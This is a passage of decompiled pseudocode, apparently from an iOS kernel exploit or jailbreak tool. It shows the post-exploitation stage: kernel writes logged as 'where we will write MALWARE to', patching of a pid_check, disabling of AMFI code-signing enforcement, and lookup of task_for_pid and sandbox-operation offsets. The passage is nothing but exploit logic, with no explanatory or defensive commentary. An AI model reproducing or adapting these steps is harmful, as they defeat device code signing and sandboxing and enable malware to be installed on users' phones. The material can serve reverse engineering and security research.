_logToFile("where we will write MALWARE to: 0x%08x\n", r10, 0x8, sp + 0x34);
    vm_write(*r8, stack[2019], sp + 0x94, 0x4);
    vm_write(*r8, stack[2019] + 0x4, sp + 0x94, 0x4);
    r1 = r10;
    if (vm_write(r11, r1, 0x4fe83, 0x10) != 0x0) {
            _logToFile("Hacked FAILED\n", r1, 0x4fe83, 0x10);
    }
    r8 = 0x55dd0;
    vm_write(r11, r10 + 0x10, sp + 0x34, 0x8);
    r5 = [[NSNotificationCenter defaultCenter] retain];
    asm { strd       r1, r0, [sp, #0xb0 + var_88] };
    r4 = [objc_msgSend(@class(NSDictionary), stack[2008]) retain];
    r11 = 0x0;
    objc_msgSend(r5, stack[2006]);
    [r4 release];
    [r5 release];
    r10 = stack[2010];
    r6 = stack[2009];
    r5 = stack[2005];
    _find_tfp_off(r10, r6, r5, sp + 0x24);
    r1 = stack[2011];
    r2 = sp + 0x94;
    asm { strd       fp, fp, [sp, #0xb0 + var_20] };
    vm_read_overwrite(*r8, r1, 0x4, sp + 0x90, r2);
    r4 = sp + 0x94;
    vm_write(*r8, stack[2011], r4, 0x4);
    _logToFile("patched pid_check\n", stack[2011], r4, 0x4);
    r0 = _find_cs_enforcement_disable_amfi();
    asm { strd       fp, fp, [sp, #0xb0 + var_20] };
    vm_read_overwrite(*r8, r0 + r10, 0x4, sp + 0x90, r4);
    vm_write(*r8, r0 + r10, sp + 0x94, 0x4);
    _find_sbops(r10, r6, r5, sp + 0x90);
    _logToFile("Found sbops 0x%08x\n", stack[2038], r5, sp + 0x90);